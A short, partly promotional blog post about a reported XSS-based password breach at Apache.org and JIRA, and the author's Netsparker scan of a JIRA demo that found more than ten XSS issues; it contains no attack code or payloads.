Clik here to view.
Apparently by exploiting a Cross-site Scripting vulnerability some attackers gained access to users' passwords in Apache.org and JIRA (some passwords in JIRA were plain-text).
Today when I hear the news I decided to download the latest demo version of JIRA and give it a try with Netsparker. Not surprisingly Netsparker identified more than 10 XSS vulnerabilities in JIRA.
Obviously I don't know the details of the attack or if the attack was only based on one of these Cross-site Scripting vulnerabilities, but presumably this attack would have been prevented if either JIRA or Apache.org would have used Netsparker Professional or free version of Netsparker Community Edition.
I already dropped an email to Apache Security Team and offered them a free Netsparker Professional License.
Currently Netsparker is still scanning the test system, but already identified many XSS instances, Permanent XSS issues and many other minor issues.
Clik here to view.
Image may be NSFW.Clik here to view.
Image may be NSFW.Clik here to view.
Clik here to view.
